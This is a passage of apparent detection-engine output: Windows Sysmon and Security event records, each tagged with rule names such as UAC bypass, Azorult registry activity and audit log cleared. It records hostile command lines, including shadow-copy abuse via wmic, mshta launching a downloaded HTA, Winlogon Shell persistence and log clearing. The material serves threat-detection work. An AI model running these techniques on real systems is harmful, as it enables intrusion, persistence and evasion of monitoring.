-s:c:\\users\\ieuser\\appdata\\local\\temp\\ftp.txt","ParentImage":"C:\\Windows\\System32\\ftp.exe","ParentProcessGuid":"365ABB72-55F1-5CD8-0000-00108A153300","ParentProcessId":3668,"ProcessGuid":"365ABB72-55F1-5CD8-0000-0010781C3300","ProcessId":2392,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 17:20:49.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16513,"Execution_attributes":{"ProcessID":2012,"ThreadID":300},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T17:20:49.443464Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"6661D424-EC73-5EFE-0000-00109FEA6300","ProcessId":6292,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.257"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400701,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.276333Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Explorer Root Flag Process Tree Break","Proxy Execution Via Explorer.exe"],"event":{"Event":{"EventData":{"CommandLine":"explorer.exe /root,\"c:\\windows\\System32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\Administrator.ECORP\\","Description":"Windows Explorer","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=59AB8548708342C77C51F70EEC5CED0A88DC4701,MD5=6A65873EA949C5CCC72DDEF9E9780AA5,SHA256=16656BBB748BA1C811BB2C68D987DC0F5CAF149E41A84E45F6B6ECAAF7D29AB2,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959","Image":"C:\\Windows\\explorer.exe","IntegrityLevel":"High","LogonGuid":"6661D424-948B-5EEF-0000-002072300F00","LogonId":"0xf3072","OriginalFileName":"EXPLORER.EXE","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"6661D424-EC73-5EFE-0000-00109FEA6300","ParentProcessId":6292,"ProcessGuid":"6661D424-F4F6-5EFE-0000-0010E7EFF800","ProcessId":6860,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"ECORP\\Administrator","UtcTime":"2020-07-03 09:05:58.268"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":1,"EventRecordID":400702,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.278154Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"6661D424-9438-5EEF-0000-00104DA20000","ProcessId":792,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.319"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400703,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.364162Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"00000000-0000-0000-0000-000000000000","ProcessId":6860,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.547"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400707,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.619637Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\System32\\calc.exe","ProcessGuid":"6661D424-F4F6-5EFE-0000-0010C00AF900","ProcessId":3224,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\System32\\win32calc.exe","UtcTime":"2020-07-03 
09:05:58.707"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400708,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.737753Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami /groups ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c whoami /groups ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE66-5CEB-0000-001058F50B00","ParentProcessId":3256,"ProcessGuid":"365ABB72-FE66-5CEB-0000-0010C7F80B00","ProcessId":1168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 
15:12:38.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6170,"Execution_attributes":{"ProcessID":980,"ThreadID":2220},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-27T15:12:38.290374Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Shadow Copies Creation Using Operating Systems Utilities"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\wmic.exe /output:C:\\Windows\\TEMP\\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create \"ClientAccessible\", \"C:\\\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /output:C:\\Windows\\TEMP\\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create \"ClientAccessible\", \"C:\\\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE6F-5CEB-0000-0010F4370C00","ParentProcessId":3448,"ProcessGuid":"365ABB72-FE6F-5CEB-0000-0010D33A0C00","ProcessId":3344,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 
15:12:47.456"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6182,"Execution_attributes":{"ProcessID":980,"ThreadID":2220},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-27T15:12:47.478285Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious WMI Execution","Shadow Copies Creation Using Operating Systems Utilities"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\\\Windows\\Temp\\svhost64.exe ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\\\Windows\\Temp\\svhost64.exe ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE76-5CEB-0000-0010546E0C00","ParentProcessId":2356,"ProcessGuid":"365ABB72-FE76-5CEB-0000-001077710C00","ProcessId":2840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 
15:12:54.515"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6190,"Execution_attributes":{"ProcessID":980,"ThreadID":2220},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-27T15:12:54.544664Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Script Execution From Temp Folder"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\mshta.exe\" \"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\update.hta\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft (R) HTML Application host","FileVersion":"11.00.9600.16428 (winblue_gdr.131013-1700)","Hashes":"SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-98E4-5D04-0000-0020A4350100","LogonId":"0x135a4","ParentCommandLine":"\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" C:\\Users\\IEUser\\Downloads\\update.html","ParentImage":"C:\\Program Files\\Internet Explorer\\iexplore.exe","ParentProcessGuid":"365ABB72-9972-5D04-0000-0010F0490C00","ParentProcessId":3660,"ProcessGuid":"365ABB72-9AA6-5D04-0000-00109C850F00","ProcessId":652,"Product":"Internet Explorer","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-15 
07:13:42.278"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7648,"Execution_attributes":{"ProcessID":2044,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-06-15T07:13:42.294109Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Rundll32 Without Parameters"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-0A6F-5D1D-0000-0020CA350100","LogonId":"0x135ca","ParentCommandLine":"\"C:\\Windows\\system32\\notepad.exe\" ","ParentImage":"C:\\Windows\\System32\\notepad.exe","ParentProcessGuid":"365ABB72-1256-5D1D-0000-0010FB1A1B00","ParentProcessId":1632,"ProcessGuid":"365ABB72-1282-5D1D-0000-0010DD401B00","ProcessId":2328,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-07-03 
20:39:30.254"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8352,"Execution_attributes":{"ProcessID":112,"ThreadID":2084},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-03T20:39:30.254733Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - User added to interesting group"],"event":{"Event":{"EventData":{"MemberName":"-","MemberSid":"S-1-5-21-3461203602-4096304019-2269080069-501","PrivilegeList":"-","SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x27a10f","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","TargetUserName":"Administrators"},"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"15957A0B-7182-0000-A07A-95158271D501"},"EventID":4732,"EventRecordID":191029,"Execution_attributes":{"ProcessID":624,"ThreadID":4452},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13826,"TimeCreated_attributes":{"SystemTime":"2019-09-22T11:22:05.201727Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - User added to interesting 
group"],"event":{"Event":{"EventData":{"MemberName":"-","MemberSid":"S-1-5-20","PrivilegeList":"-","SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x27a10f","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","TargetUserName":"Administrators"},"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"15957A0B-7182-0000-A07A-95158271D501"},"EventID":4732,"EventRecordID":191030,"Execution_attributes":{"ProcessID":624,"ThreadID":5108},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13826,"TimeCreated_attributes":{"SystemTime":"2019-09-22T11:23:19.251925Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":203050,"Execution_attributes":{"ProcessID":744,"ThreadID":768},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-05-08T03:00:11.778188Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"insecurebank","SubjectLogonId":"0x218b896","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":198242566,"Execution_attributes":{"ProcessID":744,"ThreadID":3396},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-25T21:28:11.073626Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"insecurebank","SubjectLogonId":"0x8d7099","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-1108"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-14 22:22:21.503","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ProcessGuid":"365ABB72-1E19-5D04-0000-0010DFC60A00","ProcessId":4020,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","UtcTime":"2019-06-14 22:22:21.503"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":7531,"Execution_attributes":{"ProcessID":1960,"ThreadID":288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:22:21.503995Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus 
Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"\"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe\",explorer.exe","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ProcessGuid":"365ABB72-1E19-5D04-0000-0010DFC60A00","ProcessId":4020,"RuleName":"Persistence - Winlogon Shell","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell","UtcTime":"2019-06-14 22:22:21.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":7532,"Execution_attributes":{"ProcessID":1960,"ThreadID":288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:22:21.535245Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"365ABB72-1E1D-5D04-0000-001003E70A00","ProcessId":1008,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-06-14 
22:22:31.925"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7536,"Execution_attributes":{"ProcessID":1960,"ThreadID":1916},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:22:31.957120Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Logon Scripts (UserInitMprLogonScript)","Suspicious Userinit Child Process"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe\"","Company":"","CurrentDirectory":"C:\\Windows\\system32\\","Description":"NpmTaskRunner","FileVersion":"1.0.0.0","Hashes":"SHA1=E2286C233467D0E164ED5ED1D07BAC9F90F74D19,MD5=41CE32C0D1D4E5BB8C63674F317450EF,SHA256=5DE788D23B247B29F116CD0583280CE10A429E9F8C1D80C42DEAB20C6F4DBB4E,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1E4A-5D04-0000-002013C00B00","LogonId":"0xbc013","ParentCommandLine":"C:\\Windows\\system32\\userinit.exe","ParentImage":"C:\\Windows\\System32\\userinit.exe","ParentProcessGuid":"365ABB72-1E51-5D04-0000-00104C340C00","ParentProcessId":3448,"ProcessGuid":"365ABB72-1E51-5D04-0000-00107B380C00","ProcessId":3444,"Product":"NpmTaskRunner","RuleName":"","TerminalSessionId":2,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-14 
22:23:13.925"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7556,"Execution_attributes":{"ProcessID":1960,"ThreadID":288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:23:13.957120Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"365ABB72-1E54-5D04-0000-0010B7B30C00","ProcessId":1724,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-06-14 22:23:26.811"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7563,"Execution_attributes":{"ProcessID":1960,"ThreadID":288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:23:26.811612Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry 
